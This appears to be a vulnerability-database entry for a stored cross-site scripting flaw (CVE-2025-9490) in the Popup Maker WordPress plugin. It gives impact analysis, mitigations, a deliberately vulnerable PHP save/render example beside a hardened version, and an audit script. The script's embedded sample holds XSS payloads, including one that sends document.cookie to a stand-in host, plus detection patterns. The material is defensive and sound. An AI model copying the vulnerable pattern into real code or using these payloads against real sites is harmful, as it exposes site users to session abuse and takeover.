CVE-2025-9490: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in danieliser Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder
The Popup Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘title’ parameter in all versions up to, and including, 1.20.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AI Analysis
Technical Summary
CVE-2025-9490 is a stored cross-site scripting (XSS) vulnerability in the Popup Maker plugin for WordPress, maintained by danieliser, affecting all versions up to and including 1.20.6. The plugin neither sanitizes the 'title' parameter when a popup is saved nor escapes it when the popup is rendered, so a value containing markup is stored verbatim and later written into the page as HTML. The privilege boundary is what makes this notable: WordPress runs its KSES filter over content submitted by users who lack the unfiltered_html capability (by default Contributors and Authors), but that filter covers core post fields only; a plugin that stores its own field straight from the request bypasses it unless the plugin sanitizes the value itself. An attacker with a Contributor account, which normally cannot publish any HTML at all, can therefore plant a script that runs in the browser of every visitor, editor or administrator who loads a page on which the popup is rendered. In that browser context the script can read non-HttpOnly cookies, capture credentials through injected forms, and perform actions with the victim's privileges. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The CVSS v3.1 base score is 6.4 (Medium); the metrics given correspond to the vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N: reachable over the network, low attack complexity, low privileges required (an authenticated Contributor), no user interaction beyond ordinary page loading, and a changed scope because the script executes in the victim's browser rather than inside the vulnerable plugin. No public exploit had been reported when this analysis was written, and no fixed release was recorded at that time either; because the affected range stops at 1.20.6, any later release should contain the fix, which administrators should confirm against the vendor's changelog before relying on it. Sites where several accounts hold Contributor access or above should treat this as a priority.
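The save-and-render pattern behind this class of bug, shown as an added illustration; this is not Popup Maker's code. The handler names, the meta key popup_title and the nonce action are hypothetical, while the WordPress functions called (update_post_meta, get_post_meta, sanitize_text_field, esc_html, wp_unslash, wp_verify_nonce, current_user_can, add_action) are real core APIs. It assumes a WordPress runtime and does not run stand-alone.

```php
<?php
// Added illustration, not Popup Maker's code. The handler names and the
// meta key 'popup_title' are hypothetical; the WordPress functions called
// are real core APIs. Requires a WordPress runtime.

/*
 * VULNERABLE: raw request value stored, then printed unescaped.
 * WordPress applies its KSES filter to post_content for users without the
 * unfiltered_html capability (Contributors and Authors by default), but a
 * plugin-specific field saved straight from $_POST never passes through it.
 */
function vuln_save_popup_title( int $post_id ): void {
    if ( isset( $_POST['popup_title'] ) ) {
        update_post_meta( $post_id, 'popup_title', $_POST['popup_title'] );
    }
}

function vuln_render_popup_title( int $post_id ): string {
    $title = get_post_meta( $post_id, 'popup_title', true );
    // A stored "<img src=x onerror=...>" lands here verbatim.
    return '<h2 class="popup-title">' . $title . '</h2>';
}

/*
 * HARDENED: nonce and capability checks, sanitize on save, escape on output.
 */
function safe_save_popup_title( int $post_id ): void {
    if ( ! isset( $_POST['popup_title'], $_POST['_popup_nonce'] ) ) {
        return;
    }
    if ( ! wp_verify_nonce( $_POST['_popup_nonce'], 'save_popup_' . $post_id ) ) {
        return; // request did not originate from the edit screen
    }
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    // The title is plain text: strip tags, NUL bytes and stray line breaks.
    // If limited HTML were a feature, wp_kses_post() would be the right
    // filter instead; wp_unslash() undoes WordPress's magic-quotes slashes.
    $clean = sanitize_text_field( wp_unslash( $_POST['popup_title'] ) );
    update_post_meta( $post_id, 'popup_title', $clean );
}

function safe_render_popup_title( int $post_id ): string {
    $title = get_post_meta( $post_id, 'popup_title', true );
    // Escape at the output boundary regardless of what is stored, so a value
    // written before the fix, or by another code path, still cannot execute.
    return '<h2 class="popup-title">' . esc_html( $title ) . '</h2>';
}

// Wiring the hardened save handler into WordPress (hypothetical usage; the
// matching edit screen must emit the nonce with wp_nonce_field()).
add_action( 'save_post', 'safe_save_popup_title' );
```

Output escaping is the control that actually closes the reported bug: sanitizing on save alone leaves values already in the database executable, and escaping alone leaves junk in the database that other consumers (exports, e-mails, the REST API) may render unsafely. Use esc_attr() rather than esc_html() where the title is placed inside an attribute.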
Potential Impact
An attacker with Contributor-level access can plant a persistent script in a WordPress site that runs Popup Maker. Because the payload is stored server-side, it executes for every user who loads a page on which the affected popup is rendered, with no further action from the attacker; the "no user interaction" CVSS metric means the victim does nothing beyond normal browsing, not that the script runs without a visitor. The impact is therefore bounded by who sees the popup. For anonymous visitors the script can redirect to phishing pages or inject fake login forms; WordPress authentication cookies are set HttpOnly, so they are not directly readable, but requests made from the victim's browser still carry them. For a logged-in editor or administrator the script can issue requests with that user's session and nonces, which is enough to create a new administrator account, install further plugins, or edit theme and plugin files where file editing has not been disabled; that is the usual path from a stored XSS to full site compromise. Confidentiality and integrity are affected; availability is not directly affected. The exposure is broad because WordPress and popup plugins are widely deployed, and Contributor accounts are routinely handed to guest authors, agencies and marketing staff. No exploitation in the wild was known at the time of analysis, but the prerequisites, one low-privilege account and a browser, are modest.
Mitigation Recommendations
1. Update Popup Maker to a release later than 1.20.6, the last affected version, and verify the installed version afterwards in the plugin list or with WP-CLI.
2. Review which accounts hold Contributor access or above and remove or downgrade those that do not need it. The attack needs only one such account, so this shrinks the attacker pool but does not make a vulnerable version safe.
3. Audit existing popups for injected markup: a legitimate title contains no tags, no on* event attributes and no javascript: URIs. Pay particular attention to popups created or last modified by low-privilege accounts.
4. Until the update is applied, deactivate the plugin or at least stop rendering popups that were created or edited by Contributor accounts.
5. A WAF rule that inspects the title field on popup save requests can block obvious payloads, but treat it as a stopgap: encoding variants and attribute-based payloads regularly evade generic XSS signatures.
6. A Content-Security-Policy that forbids inline scripts would neutralize the payload, but WordPress core and many plugins rely on inline scripts, so a policy strict enough to help needs nonces or hashes and careful testing. It is defence in depth, not the fix.
7. Keep WordPress core and all plugins current so that future disclosures in the same plugin are closed quickly.
8. Train the editors and administrators who review contributor content to treat markup in a title field as suspicious and worth reporting.
9. If the plugin can be neither updated nor removed, evaluate alternatives, weighing migration cost and checking any replacement's own disclosure history before switching.
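An added audit script for the "audit existing popups" step above; it is not part of Popup Maker. It reads the JSON that WP-CLI's wp post list prints (the post type name popup and the exported field list are assumptions; if the plugin keeps its display title in post meta, export that column as well) and flags any string field carrying markup, event-handler attributes, or javascript:/data: URIs. A constructed sample is embedded so the script runs offline.

```php
<?php
// Added audit script, not part of Popup Maker. Usage:
//   wp post list --post_type=popup --fields=ID,post_author,post_title --format=json > popups.json
//   php audit_popup_titles.php popups.json
// The post type 'popup' and the field list are assumptions. With no argument
// the embedded, constructed sample below is scanned instead.

const SAMPLE_JSON = '[
  {"ID":"41","post_author":"3","post_title":"Summer sale"},
  {"ID":"42","post_author":"7","post_title":"Win a prize<img src=x onerror=alert(document.cookie)>"},
  {"ID":"43","post_author":"7","post_title":"<a href=\"javascript:fetch(\'//example.invalid/?c=\'+document.cookie)\">Claim</a>"},
  {"ID":"44","post_author":"2","post_title":"5 < 10 is true"}
]';

// Things that have no business in a plain-text title. The tag pattern
// requires a letter after '<' so arithmetic like "5 < 10" is not flagged.
const XSS_PATTERNS = [
    'html_tag'      => '/<\s*\/?\s*[a-z][^>]*>/i',
    'event_handler' => '/\bon[a-z]+\s*=/i',
    'js_uri'        => '/javascript\s*:/i',
    'data_uri'      => '/data\s*:\s*text\/html/i',
];

/**
 * Scan every string field of every record; return one finding per
 * (record, field) pair that matches at least one pattern.
 */
function audit_records( array $records ): array {
    $findings = [];
    foreach ( $records as $rec ) {
        foreach ( $rec as $field => $value ) {
            if ( ! is_string( $value ) ) {
                continue;
            }
            $hits = [];
            foreach ( XSS_PATTERNS as $name => $re ) {
                if ( preg_match( $re, $value ) ) {
                    $hits[] = $name;
                }
            }
            if ( $hits ) {
                $findings[] = [
                    'ID'     => $rec['ID'] ?? '?',
                    'author' => $rec['post_author'] ?? '?',
                    'field'  => $field,
                    'hits'   => $hits,
                    'sample' => substr( $value, 0, 80 ),
                ];
            }
        }
    }
    return $findings;
}

$json    = isset( $argv[1] ) ? file_get_contents( $argv[1] ) : SAMPLE_JSON;
$records = json_decode( $json, true );
if ( ! is_array( $records ) ) {
    fwrite( STDERR, "input is not a JSON array\n" );
    exit( 2 );
}

$findings = audit_records( $records );
foreach ( $findings as $f ) {
    printf(
        "popup %s (author %s) %s: %s | %s\n",
        $f['ID'], $f['author'], $f['field'], implode( ',', $f['hits'] ), $f['sample']
    );
}
// Exit status 1 when anything was flagged, so the script can gate a cron job.
exit( $findings ? 1 : 0 );
```

On the embedded sample the script reports popups 42 (html_tag, event_handler) and 43 (html_tag, js_uri) and leaves 41 and 44 alone. Anything it flags should be checked against the popup's revision history and the account that saved it, since a cleaned title says nothing about whether the payload already ran in an administrator's browser.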
Affected Countries
United States, United Kingdom, Germany, Canada, Australia, India, France, Brazil, Netherlands, Japan, South Korea, Italy
Technical Details
- Data Version: 5.1
- Assigner Short Name: Wordfence
- Date Reserved: 2025-08-26T13:36:25.900Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 68d625c5452d465b6e4d0619
Added to database: 9/26/2025, 5:33:57 AM
Last enriched: 2/26/2026, 5:58:29 PM
Last updated: 3/26/2026, 9:38:57 AM